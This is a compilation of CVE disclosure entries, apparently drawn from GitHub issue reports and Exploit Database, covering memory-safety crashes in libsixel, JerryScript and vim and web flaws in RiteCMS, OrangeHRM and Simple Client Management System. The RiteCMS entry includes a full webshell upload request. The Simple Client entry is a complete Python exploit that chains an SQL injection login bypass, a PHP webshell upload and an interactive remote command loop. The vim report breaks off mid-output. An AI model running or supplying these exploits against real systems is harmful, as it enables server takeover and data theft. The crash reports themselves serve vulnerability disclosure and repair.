libsixel 1.8.6 is affected by Buffer Overflow in libsixel/src/quant.c:876.

Hi,I found a heap-buffer-overflow in the current master 6a5be8b  
I build `img2sixel` with `ASAN`,this is ASAN report.

OS: Ubuntu 20.04.3 LTS x86\_64  
Kernel: 5.11.0-27-generic

POC: poc.zip

    $ ./img2sixel -o ./a.sixel -7 -p 1 -C 5 -d stucki -E size ~/Downloads/poc
    =================================================================
    ==2216856==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62e00000c3fd at pc 0x7ffff74e5a7e bp 0x7fffffffc340 sp 0x7fffffffc330
    READ of size 1 at 0x62e00000c3fd thread T0
        #0 0x7ffff74e5a7d in error_diffuse /home/wulearn/Desktop/testtt/libsixel/src/quant.c:876
        #1 0x7ffff74e6027 in diffuse_stucki /home/wulearn/Desktop/testtt/libsixel/src/quant.c:1002
        #2 0x7ffff74e8154 in sixel_quant_apply_palette /home/wulearn/Desktop/testtt/libsixel/src/quant.c:1417
        #3 0x7ffff74eab2b in sixel_dither_apply_palette /home/wulearn/Desktop/testtt/libsixel/src/dither.c:801
        #4 0x7ffff74d9d9c in sixel_encode_dither /home/wulearn/Desktop/testtt/libsixel/src/tosixel.c:830
        #5 0x7ffff74e1c75 in sixel_encode /home/wulearn/Desktop/testtt/libsixel/src/tosixel.c:1551
        #6 0x7ffff7535f3b in sixel_encoder_output_without_macro /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:825
        #7 0x7ffff75371e2 in sixel_encoder_encode_frame /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1056
        #8 0x7ffff753b0af in load_image_callback /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1679
        #9 0x7ffff752b085 in load_with_builtin /home/wulearn/Desktop/testtt/libsixel/src/loader.c:963
        #10 0x7ffff752b5cb in sixel_helper_load_image_file /home/wulearn/Desktop/testtt/libsixel/src/loader.c:1418
        #11 0x7ffff753b513 in sixel_encoder_encode /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1743
        #12 0x555555558a3b in main /home/wulearn/Desktop/testtt/libsixel/converters/img2sixel.c:457
        #13 0x7ffff72c60b2 in __libc_start_main (/usr/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #14 0x55555555638d in _start (/home/wulearn/Desktop/testtt/libsixel/converters/.libs/img2sixel+0x238d)
    
    0x62e00000c3fd is located 3 bytes to the left of 47208-byte region [0x62e00000c400,0x62e000017c68)
    allocated by thread T0 here:
        #0 0x7ffff76a2bc8 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
        #1 0x555555558c4e in rpl_malloc /home/wulearn/Desktop/testtt/libsixel/converters/malloc_stub.c:45
        #2 0x7ffff7549243 in sixel_allocator_malloc /home/wulearn/Desktop/testtt/libsixel/src/allocator.c:162
        #3 0x7ffff7535cab in sixel_encoder_output_without_macro /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:789
        #4 0x7ffff75371e2 in sixel_encoder_encode_frame /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1056
        #5 0x7ffff753b0af in load_image_callback /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1679
        #6 0x7ffff752b085 in load_with_builtin /home/wulearn/Desktop/testtt/libsixel/src/loader.c:963
        #7 0x7ffff752b5cb in sixel_helper_load_image_file /home/wulearn/Desktop/testtt/libsixel/src/loader.c:1418
        #8 0x7ffff753b513 in sixel_encoder_encode /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1743
        #9 0x555555558a3b in main /home/wulearn/Desktop/testtt/libsixel/converters/img2sixel.c:457
        #10 0x7ffff72c60b2 in __libc_start_main (/usr/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/wulearn/Desktop/testtt/libsixel/src/quant.c:876 in error_diffuse
    Shadow bytes around the buggy address:
      0x0c5c7fff9820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5c7fff9830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5c7fff9840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5c7fff9850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5c7fff9860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c5c7fff9870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
      0x0c5c7fff9880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5c7fff9890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5c7fff98a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5c7fff98b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5c7fff98c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2216856==ABORTING
    
    

It happens in:  

error\_diffuse(data, pos + width \* 1 - 2, depth, error, 1, 24);

when x=0, y=0, width=1,then

gdb info:  
![image](https://user-images.githubusercontent.com/43570004/131661031-3f3ff180-cf8f-409b-a54b-df4b885f4d2c.png)

In this position,\[r13+rcx\*1+0x0\] will be `0x100000000000f7e6d` =>`0xf7e6d`  
So,writing to data will cause `overflow`  
and then it writes to a location (chunk) in the heap that should not be written to.

heap info:  
Before:

    0xf5fda0            0x0                 0x60                 Freed                0x0              None
    0xf5fe00            0x0                 0x8060               Used                None              None
    0xf67e60            0x0                 0x70                 Used                None              None
    0xf67ed0            0x0                 0x30                 Used                None              None
    0xf67f00            0x0                 0x10010              Used                None              None
    0xf77f10            0x0                 0x7eb0               Freed     0x7ffff7c9cbe0    0x7ffff7c9cbe0
    0xf7fdc0            0x7eb0              0xd0                 Freed                0x0              None
    
    

After:

    0xf5fda0            0x0                 0x60                 Freed                0x0              None
    0xf5fe00            0x0                 0x8060               Used                None              None
    Corrupt ?!

CVE-2022-27044: heap-buffer-overflow in libsixel/src/quant.c:876 · Issue #156 · saitoha/libsixel

RiteCMS version 3.1.0 and below suffers from a remote code execution vulnerability in the admin panel. An authenticated attacker can upload a PHP file and bypass the .htacess configuration to deny execution of .php files in media and files directory by default.

\# Exploit Title: RiteCMS - File Upload Restriction Bypass to Remote Code Execution (Authenticated) \# Date: 2021-07-25 \# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) \# Vendor Homepage: https://ritecms.com/ \# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip \# Version: <= 3.1.0 \# Tested on: Windows 10, Ubuntu 18, XAMPP \# Google Dork: intext:"Powered by RiteCMS" \# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597 """ ################ \# Description # ################ \# RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default. \# There are 4 ways of bypassing the current file upload protection to achieve remote code execution. \# Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved \# Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved \# Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability. Intercept the request, modify file\_name param and place this payload "../webrootExec.php" to upload the php file to web root body= Content-Disposition: form-data; name="file\_name" body= ../webrootExec.php So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php \# Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" - RCE achieved $ cat .htaccess <Files \*.php> deny from all </Files> <Files ~ "webshell\\.php$"> Allow from all </Files> ################################### \# PoC for webshell using Method 2 # ################################### Steps to Reproduce: 1\. Login as admin 2\. Go to Files Manager 3\. Choose a directory to upload .php file either media or files directory. 4\. Then, click Upload file > Browse.. 3\. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess 4\. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory Request: \======== POST /ritecms.v3.1.0/admin.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309 Content-Length: 1744 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="mode" filemanager \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file"; filename="webshell.pHp" Content-Type: application/octet-stream <?php system($\_GET\[base64\_decode('Y21k')\]);?> \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="directory" media \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file\_name" \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload\_mode" 1 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize\_xy" x \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize" 640 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="compression" 80 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail\_resize\_xy" x \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail\_resize" 150 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail\_compression" 70 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload\_file\_submit" OK - Upload file \-----------------------------410923806710384479662671954309-- #################### \# Webshell access: # #################### \# Webshell access via: PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id \# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) """

CVE-2021-46367: RiteCMS version 3.1.0 suffers from a remote code execution in admin panel

jbd2_journal_wait_updates in fs/jbd2/transaction.c in the Linux kernel before 5.17.1 has a use-after-free caused by a transaction_t race condition.

CVE-2022-28796

A Heap-based Buffer Overflow vulnerability exists in JerryScript 2.4.0 and prior versions via an out-of-bounds read in parser_parse_for_statement_start in the js-parser-statm.c file. This issue is similar to CVE-2020-29657.

**JerryScript revision**

$ jerry --version
Version: 3.0.0 (5a69b183)

**Build platform**

$ echo "$(lsb\_release -ds) ($(uname -mrs))"
Ubuntu 20.04.1 LTS (Linux 4.15.0-142-generic x86\_64)

**Build steps****Test case**

There are two test cases, where `jerry_poc_crash.js` can trigger a direct crash of the clean-built jerry and `jerry_poc_asan.js` can trigger a heap-overflow of the ASAN-enabled-built jerry.

This bug is found by a naive fuzzer. And I use `afl-tmin` to reduce the test cases. I sincerely apologize for making them struggling.

*   jerry\_poc\_crash.js

R\=function(){({0:0})
function x(){for(v in 0){function o(){}function x(){for(;;)for(function(){class A extends function(){for(let;;){((function(){}))}0\=function(){}
class e

*   jerry\_poc\_asan.js

R \= function() {
    function x(){
        function y(){
            for(;;)
                for(function(){
                    class A extends function() {
                        for(let;;) {
                            ((function(){}))
                        }

**Execution steps**

$ ~/release/jerryscript/build/bin/jerry jerry\_poc\_crash.js
Segmentation fault (core dumped)

$ ~/asan/jerryscript/build/bin/jerry jerry\_poc\_asan.js
==38036==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000005692 at pc 0x55555566952c bp 0x7fffffff9020 sp 0x7fffffff9010
READ of size 1 at 0x612000005692 thread T0
    #0 0x55555566952b  (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b)
    #1 0x55555566a84e  (/home/docker/asan/jerryscript/build/bin/jerry+0x11684e)
    #2 0x555555589aa2  (/home/docker/asan/jerryscript/build/bin/jerry+0x35aa2)
    #3 0x55555579d5c9  (/home/docker/asan/jerryscript/build/bin/jerry+0x2495c9)
    #4 0x5555555dead1  (/home/docker/asan/jerryscript/build/bin/jerry+0x8aad1)
    #5 0x555555633868  (/home/docker/asan/jerryscript/build/bin/jerry+0xdf868)
    #6 0x5555555c6462  (/home/docker/asan/jerryscript/build/bin/jerry+0x72462)
    #7 0x5555557c2c8e  (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #8 0x5555555f4ea1  (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1)
    #9 0x5555555f6d8e  (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e)
    #10 0x5555556188ae  (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae)
    #11 0x55555562451a  (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a)
    #12 0x55555563e211  (/home/docker/asan/jerryscript/build/bin/jerry+0xea211)
    #13 0x5555555c1f67  (/home/docker/asan/jerryscript/build/bin/jerry+0x6df67)
    #14 0x5555557c2c8e  (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #15 0x5555555f4ea1  (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1)
    #16 0x5555555f6d8e  (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e)
    #17 0x5555556188ae  (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae)
    #18 0x55555562451a  (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a)
    #19 0x555555625454  (/home/docker/asan/jerryscript/build/bin/jerry+0xd1454)
    #20 0x555555634129  (/home/docker/asan/jerryscript/build/bin/jerry+0xe0129)
    #21 0x5555555c6462  (/home/docker/asan/jerryscript/build/bin/jerry+0x72462)
    #22 0x5555557c2c8e  (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #23 0x55555560b8c8  (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8)
    #24 0x5555555c61c2  (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2)
    #25 0x5555557c2c8e  (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #26 0x55555560b8c8  (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8)
    #27 0x5555555c61c2  (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2)
    #28 0x5555557c2c8e  (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #29 0x5555555f4ea1  (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1)
    #30 0x5555555f6d8e  (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e)
    #31 0x5555556188ae  (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae)
    #32 0x55555562451a  (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a)
    #33 0x5555555ca181  (/home/docker/asan/jerryscript/build/bin/jerry+0x76181)
    #34 0x5555557c982d  (/home/docker/asan/jerryscript/build/bin/jerry+0x27582d)
    #35 0x55555592b342  (/home/docker/asan/jerryscript/build/bin/jerry+0x3d7342)
    #36 0x5555555718c9  (/home/docker/asan/jerryscript/build/bin/jerry+0x1d8c9)
    #37 0x7ffff73ba0b2  (/lib/x86\_64-linux-gnu/libc.so.6+0x270b2)
    #38 0x555555580add  (/home/docker/asan/jerryscript/build/bin/jerry+0x2cadd)

Address 0x612000005692 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b)
Shadow bytes around the buggy address:
  0x0c247fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=\>0x0c247fff8ad0: fa fa\[fa\]fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==38036==ABORTING
Aborted

**Output**

See above.

**Backtrace**

See above.

**Expected behavior**

Not to crash

CVE-2021-43453: Heap-overflow on an ill-formed JS program · Issue #4754 · jerryscript-project/jerryscript

OrangeHRM 4.10 is vulnerable to a Host header injection redirect via viewPersonalDetails endpoint.

**Environment details**  
OrangeHRM version: 4.10  
OrangeHRM source: Release build from Sourceforge or Git clone  
Platform: Ubuntu  
PHP version: 7.3.33  
Database and version: MariaDB 10.3  
Web server: Apache 2.4.52

If applicable:  
Browser: Firefox

**Describe the bug**  
When an authenticated user submits the "Personal Details" form, a 302 redirect to the "Personal Details" URL is sent in the response. Following is a request and its response—

    POST /symfony/web/index.php/pim/viewPersonalDetails HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 332
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/symfony/web/index.php/pim/viewMyDetails
    Cookie: Loggedin=True; _orangehrm=1ba9si14k85n5cfdc39frt4mis
    Upgrade-Insecure-Requests: 1
    
    personal%5B_csrf_token%5D=f80390168c630daa51a6ed85467cad78&personal%5BtxtEmpID%5D=2&personal%5BtxtEmpFirstName%5D=Pranav&personal%5BtxtEmpMiddleName%5D=&personal%5BtxtEmpLastName%5D=S&personal%5BtxtOtherID%5D=&personal%5BtxtLicExpDate%5D=yyyy-mm-dd&personal%5BoptGender%5D=1&personal%5BcmbMarital%5D=Single&personal%5BcmbNation%5D=0
    

Response:

    HTTP/1.1 302 Found
    Date: Wed, 09 Mar 2022 05:49:01 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Location: http://localhost/symfony/web/index.php/pim/viewPersonalDetails/empNumber/2
    Content-Length: 148
    Connection: close
    Content-Type: text/html; charset=utf-8
    
    

It was noticed that upon manipulating the Host header, in the POST request, to an arbitrary domain, it was possible to inject the Host header into the URL redirection in the 302 response. A user would then be redirected to the arbitrary domain. For example, the domain "example.com" can be passed as the value of the Host header in the POST request. The resulting 302 response redirects the user to http://example.com/symfony/web/index.php/pim/viewPersonalDetails/empNumber/2. Due to the nature of this vulnerability, it can be used in phishing attacks.

Following are the endpoints in the OrangeHRM application that are vulnerable to the Host Header Injection Redirect vulnerability:

1.  /symfony/web/index.php/pim/viewPersonalDetails
2.  /symfony/web/index.php/auth/validateCredentials

**To Reproduce**

1.  Login to the OrangeHRM application
2.  Navigate to "My Info"
3.  Under "Personal Details", click on "Edit"
4.  Turn on Intercept in Burp Suite (or any other web proxy)
5.  Click on "Save"
6.  Change the value of the `Host` header to `attacker.com`
7.  Click on Forward in Burp and turn off Intercept
8.  You will notice that the page gets redirected to `http://attacker.com/symfony/web/index.php/pim/viewPersonalDetails/empNumber/X`

**Expected behavior**  
A 404 error.

**What do you see instead:**  
A 302 redirect to the malicious domain.

**Screenshots**  
![image](https://user-images.githubusercontent.com/37404408/157669760-53d01d4d-03a2-4f62-8216-e4c120175c8a.png)  
![image](https://user-images.githubusercontent.com/37404408/157669846-c47ca311-a7c6-444a-8275-defdec31003b.png)

CVE-2022-27110: Host header injection redirect vulnerability · Issue #1175 · orangehrm/orangehrm

A Remote Code Execution (RCE) vulnerability exists in Simple Client Management System 1.0 in create.php due to the failure to validate the extension of the file being sent in a request.

**Simple Client Management System 1.0 - Remote Code Execution (RCE)**

**Platform:****PHP**

**Date:****2021-07-05**

  

    # Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE)
    # Date: July 4, 2021
    # Exploit Author: Ishan Saha
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip
    # Version: 1.0
    # Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 & Ubuntu & Kali
    
    #!/usr/bin/python
    
    # Description:
    
    # 1. This uses the SQL injection to bypass the admin login and create a new user
    # 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server
    # 3. the shell is called from the location 
    
    import requests 
    from colorama import Fore, Back, Style
    '''
    Description:
    Using the sql injeciton to bypass the login and create a user. 
    This user creates a client with the shell as an image and uploads the shell.
    The shell is called by the requests library for easier use.
    ------------------------------------------
    Developed by - Ishan Saha & HackerCTF team  (https://twitter.com/hackerctf)
    ------------------------------------------
    '''
    # Variables : change the URL according to need
    URL="http://192.168.0.248/client/"
    shellcode = "<?php system($_GET['cmd']);?>"
    filename = "shell.php"
    authdata={"username":"admin' or '1'='1","password":"admin' or '1'='1","login":"Submit Query"}
    createuser = {"fname":"ishan","lname":"saha","email":"research@hackerctf.com","password":"Grow_with_hackerctf","contact":"1234567890","signup":"Sign Up"}
    userlogin={"uemail":"research@hackerctf.com","password":"Grow_with_hackerctf","login":"LOG IN"}
    shelldata={"fname":"a","lname":"l","uname":"l","email":"l@l.l","phone":"1234567890","plan":"k","pprice":"k","proofno":"l","caddress":"ll","haddress":"ll","rdate":"9/9/09","bdate":"9/9/09","depatment":"l","csubmit":"Submit"}
    def format_text(title,item):
      cr = '\r\n'
      section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr 
      item=str(item)
      text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+  Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
      return text
    
    
    ShellSession = requests.Session()
    response = ShellSession.get(URL)
    response = ShellSession.post(URL + "admin/index.php",data=authdata)
    response = ShellSession.post(URL + "admin/regester.php",data=createuser)
    response = ShellSession.post(URL,data=userlogin)
    response = ShellSession.post(URL + "create.php",data=shelldata,files={"uimg":(filename,shellcode,"application/php"),"proof1":(filename,shellcode,"application/php"),"proof2":(filename,shellcode,"application/php")})
    location = URL +"img/" + filename
    #print statements
    print(format_text("Target",URL),end='')
    print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
    print(format_text("shell location",location),end='')
    print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))
    
    while True:
        cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)
        if cmd == 'exit':
            break
        print(ShellSession.get(location + "?cmd="+cmd).content.decode())

CVE-2021-43484: Offensive Security’s Exploit Database Archive

heap buffer overflow in get_one_sourceline in GitHub repository vim/vim prior to 8.2.4647.

**Description**

When fuzzing vim commit 471b3aed3 I discovered a heap buffer overflow. I'm using ubuntu 20.04 with clang 13

**Proof of Concept**

Here is the minimized poc

    norm300gr0
    so
    

How to build

    LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
    make -j$(nproc)
    

Proof of Concept

Run crafted file with this command

./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!

ASan stack trace:

    aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_get_one_sourceline -c :qa!
    =================================================================
    ==2393051==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000004c6c at pc 0x000000430f36 bp 0x7fffffff7e50 sp 0x7fffffff7610
    READ of size 1 at 0x612000004c6c thread T0
        #0 0x430f35 in strlen (/home/aldo/vimtes/src/vim+0x430f35)
        #1 0xafb4c6 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1930:25
        #2 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
        #3 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
        #4 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
        #5 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #6 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #7 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #8 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #9 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #10 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #11 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #12 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #13 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #14 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #15 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #16 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #17 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
        #18 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #19 0x41edcd in _start (/home/aldo/vimtes/src/vim+0x41edcd)
    
    0x612000004c6c is located 0 bytes to the right of 300-byte region [0x612000004b40,0x612000004c6c)
    allocated by thread T0 here:
        #0 0x499fa9 in realloc (/home/aldo/vimtes/src/vim+0x499fa9)
        #1 0x4cbea5 in ga_grow_inner /home/aldo/vimtes/src/alloc.c:741:10
        #2 0x4cbc33 in ga_grow /home/aldo/vimtes/src/alloc.c:720:9
        #3 0x4cc637 in ga_concat /home/aldo/vimtes/src/alloc.c:834:9
        #4 0xafb1a0 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1919:6
        #5 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
        #6 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
        #7 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
        #8 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #9 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #10 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #11 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #12 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #13 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #14 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #15 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #16 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #17 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #18 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #19 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #20 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
        #21 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vimtes/src/vim+0x430f35) in strlen
    Shadow bytes around the buggy address:
      0x0c247fff8930: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff8950: 00 00 00 00 00 00 00 00 00 00 00 00 00 05 fa fa
      0x0c247fff8960: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
